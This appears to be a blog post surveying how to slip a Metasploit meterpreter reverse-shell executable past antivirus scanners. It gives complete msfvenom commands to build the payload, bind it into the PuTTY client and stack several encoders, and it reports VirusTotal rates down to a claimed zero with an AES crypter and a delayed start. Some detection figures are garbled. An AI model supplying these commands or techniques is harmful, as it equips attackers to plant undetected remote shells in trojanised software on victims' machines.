A Quick Survey on Anti-Anti-Viruses

c++ malware

tl;dr

AVs can easily be bypassed using malware AES crypters like Crypt0r:

AES Parameters

Open Source Evasion Techniques

All of the following results are based on a meterpreter file which was generated like this:

msfvenom
  -p windows/meterpreter/reverse_tcp
  --platform windows
  -f exe
  LHOST=192.168.1.1
  LPORT=1337
  -o meter.exe

All scans are performed on VirusTotal. Please not that this covers static analysis only. However, it will become clear later on that dynamic analysis of the used techniques aren’t required at all.

Packers

Packers compress malware and decompress it at runtime using an embedded decompression stub. Using the packer UPX seems to be suspicious as the detection rates increase by using a packer:

Without Packer 3956
With Packer 4156

Binder

This technique basically combines two executables, a malicious and an ordinary one, into one file. The malicious code will be executed in a separate thread upon startup. This command was used to generate a meterpreter shell in combination with the SSH client PuTTY:

msfvenom
  -p windows/meterpreter/reverse_tcp
  --platform windows
  -x putty.exe
  -k
  -f exe
  LHOST=192.168.1.1
  LPORT=1337
  -f exe
  -o meter.exe

A slight decrease of detections can be seen:

Without Binder 3956
With Binder 3356

Encoders

Using Encoders, the malicious payload will be obscured. There are many different approaches for this, however the polymorphic encoder shikata_ga_nai is one of the most widely used ones. When executing a encoded malware file, the entry point of the decoding method will be called. The payload will then be decoded and executed.

The results are the following:

No Encoder 39/56
XOR 33/56
powershell_x86 33/56
shikata_ga_nai 33/56

No change in detection rates - let’s combine multiple encoders and the binding technique:

msfvenom -p windows/meterpreter/reverse_tcp
  LHOST=192.168.1.1
  LPORT 1337
  -f raw
  -e x86/context_time
  -i 1
  --platform windows |

msfvenom -a x86
  --platform windows
  -e x86/countdown
  -i 7
  -f raw |

msfvenom -a x86
  --platform windows
  -e x86/context_cpuid
  -i 1
  -f raw |

msfvenom -a x86
  --platform windows
  -e x86/shikata_ga_nai
  -i 2
  -x putty.exe
  -k
  -f exe
  -o meter.exe

This yields 30/56 - better but still not zero.

Using Veil

Using Veil, hiding payloads becomes quite easy using a built-in assistant. Using

python/shellcode_inject/aes_encrypt

in combination with Pyherion and a shellcode for

windows/meterpreter/reverse_tcp

decreases the detection rate down to 19/56.

Crypters

Crypters encrypt the malicious shellcode using a secure encryption algorithm. To execute the payload at runtime, the so called stub brute forces the built-in encrypted shellcode in order to invoke it. Using AES-128 and a delayed decryption, it was possible to decrease the detection down to zero for both scantime and runtime. The runtime detection bypass basically delays the start of the decryption routine by performing unnecessary actions like:

In my tests, wasting about 30 seconds was enough to “shake off” the AV runtime check.

You can check out the source code here.

Coding A CS:GO Hack

reverse-engineering c++ binary

Creating A Multiplayer Game Hack

c++ binary hooking reverse-engineering

Runtime Function Patching

c++ binary cracking reverse-engineering